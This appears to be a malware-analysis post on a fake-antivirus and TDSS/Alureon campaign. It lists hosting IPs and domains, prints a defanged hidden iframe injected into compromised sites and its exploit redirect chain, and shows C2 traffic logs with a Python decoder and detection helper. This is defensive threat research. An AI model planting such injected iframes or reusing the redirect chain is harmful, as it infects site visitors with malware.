A quick look at the IP block 209.44.126.0/24, hosted by "Netelligent Hosting Services Inc", which serves several fake AV websites as well as exploit pages spreading the trojan TDSS/Alureon.
All of these were reached through iframes injected into legitimate websites, poisoned keywords in Google search results, and links on ad networks (screenshot below).
The lure text reads: "Check it out - maybe someone have access to your PC right now! Protect yourself."
Google also shows 14,800 results for this phrase.
Detection: Trojan TDSS, Trojan DNSChanger, Trojan Kryptik, Trojan FakeSpyGuard, Trojan InternetAntivirusPro
Sites serving the fake antivirus campaign:
209.44.126.16: systemsecurityonline.com, systemsecuritytool.com
209.44.126.29: individualpeople.biz (analyzed below)
Name servers (NS) for the rogue fake AV websites:
209.44.126.14 209.44.126.15 209.44.126.16 209.44.126.17 209.44.126.22 209.44.126.23
209.44.126.32: asmmnation.com (ThreatExpert report), used in conjunction with an IP in Ukraine (see the Symantec write-up).
On the IP 209.44.126.29 we also find a couple of pages with exploits that lead to the trojan TDSS (Alureon).
I will take the domain individualpeople[.]biz as an example.
Malicious script (IFRAME) inserted into the compromised site, and the redirection chain it triggers:
<iframe src="hxxp://individualpeople.biz/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>
This redirects to the page below, which hosts several exploits (JavaScript analysis: Wepawet):
hxxp://individualpeople.biz/go.php?sid=6 (Anubis report)
hxxp://209.44.126.30/unsecurity/pdf.php (Wepawet analysis, VirusTotal)
which finally loads this page:
hxxp://209.44.126.30/unsecurity/load.php (VirusTotal, Anubis)
Detections: W32/Alureon.B!Generic, Win32.Rootkit.TDSS.eyj.4, Packed.Win32.Tdss.f, Trojan.Win32.FakeSpyguard, Trojan:Win32/Alureon.gen!J, Trojan/Fakealert.gen
--------------------------------------
HTTP activity after infection
92.48.91.145:80 - [trafficstatic.net]
Request: GET /banner/crcmds/main Response: 200 "OK"
Request: GET /banner/crcmds/init Response: 200 "OK"
Request: GET /banner/uacsrcr.dat Response: 200 "OK"
Request: GET /banner/crcmds/update Response: 200 "OK"
Request: GET /banner/crfiles/uacd Response: 200 "OK"
Request: GET /banner/crfiles/uacc Response: 200 "OK"
Request: GET /banner/crfiles/uaclog Response: 200 "OK"
Request: GET /banner/crfiles/uacmask Response: 200 "OK"
Request: GET /banner/crfiles/uacserf Response: 200 "OK"
Request: GET /banner/crcmds/types/standart Response: 404 "Not Found"
Request: GET /banner/crcmds/types/standart Response: 404 "Not Found"
Request: GET /banner/crcmds/types/standart Response: 404 "Not Found"
Request: GET /banner/crcmds/affids/11 Response: 404 "Not Found"
Request: GET /banner/crcmds/affids/11 Response: 404 "Not Found"
Request: GET /banner/crcmds/affids/11 Response: 404 "Not Found"
Request: GET /banner/crcmds/subids/v3072 Response: 404 "Not Found"
Request: GET /banner/crcmds/subids/v3072 Response: 404 "Not Found"
Request: GET /banner/crcmds/subids/v3072 Response: 404 "Not Found"
Request: GET /banner/crcmds/builds/bbr Response: 200 "OK"
Request: GET /banner/crfiles/uacbbr Response: 200 "OK"
72.233.114.126:80 - [statsanalist.cn]
Request: GET /?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5 Response: 200 "OK"
Request: GET /?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5 Response: 200 "OK"
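As an added example (not part of the original post), this Python script decodes the obfuscated parameters of the two statsanalist.cn check-ins above: each value is base64 over a single-byte XOR, and the key can be recovered from the affid and subid values, which the trafficstatic.net paths (/affids/11, /subids/v3072) give in clear. The looks_like_checkin helper is a hypothetical proxy-log test built from the same two request shapes.

```python
import base64
from urllib.parse import parse_qs, urlsplit

# The two statsanalist.cn check-in requests, copied from the captured traffic above.
CHECKINS = [
    "/?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5",
    "/?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5",
]
# Parameters that carry base64(XOR-obfuscated) values; mode and v are plain.
ENCODED_PARAMS = ("gd", "affid", "subid", "prov")


def recover_key(encoded: str, known_plaintext: str) -> int:
    """Recover a single-byte XOR key from one parameter whose cleartext is known.
    The known plaintext is an assumption taken from the trafficstatic.net paths
    above: affid=11 (/affids/11) and subid=v3072 (/subids/v3072)."""
    raw = base64.b64decode(encoded)
    if len(raw) != len(known_plaintext):
        raise ValueError("ciphertext/plaintext length mismatch")
    keys = {c ^ ord(p) for c, p in zip(raw, known_plaintext)}
    if len(keys) != 1:
        raise ValueError("not a single-byte XOR: %r" % sorted(keys))
    return keys.pop()


def decode_param(encoded: str, key: int) -> str:
    """base64-decode, then XOR every byte with the recovered key."""
    return bytes(b ^ key for b in base64.b64decode(encoded)).decode("ascii")


def decode_checkin(path: str, key: int) -> dict:
    """Return the query parameters of one check-in, with encoded ones decoded."""
    query = parse_qs(urlsplit(path).query, keep_blank_values=True)
    out = {}
    for name, values in query.items():
        out[name] = decode_param(values[0], key) if name in ENCODED_PARAMS else values[0]
    return out


def looks_like_checkin(path: str) -> bool:
    """Cheap proxy-log test for the two request shapes captured above: the
    trafficstatic.net command/file paths, or a query with mode=cr and gd."""
    parts = urlsplit(path)
    if parts.path.startswith(("/banner/crcmds/", "/banner/crfiles/")):
        return True
    query = parse_qs(parts.query)
    return query.get("mode") == ["cr"] and "gd" in query


if __name__ == "__main__":
    key = recover_key("Xl4=", "11")  # known plaintext from /affids/11
    for req in CHECKINS:
        print(hex(key), decode_checkin(req, key))
```

Running it prints the recovered key and the cleartext gd/affid/subid/prov values of each beacon, which lets the two hosts' traffic be tied to the same affiliate and sub-id.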
IPs implicated:
209.44.126.14 209.44.126.15 209.44.126.16 209.44.126.17 209.44.126.22 209.44.126.23 209.44.126.29 209.44.126.32
Other domains used in conjunction can be found on ThreatExpert by searching for the path /banner/crcmds/main (Report 1, Report 2):
92.48.91.144: trafficstatic.com, explorerex.com, windowslogonex.com
92.48.91.145: trafficstatic.net (ThreatExpert Report)
95.211.14.159: golddiggero1.com
76.76.103.162: webieupdate.net
94.76.208.32: symupdate2.com (ThreatExpert Report)
72.233.114.125: webnicrisoft.net (ThreatExpert Report)
64.213.140.254: webmsupdate.net (ThreatExpert Report)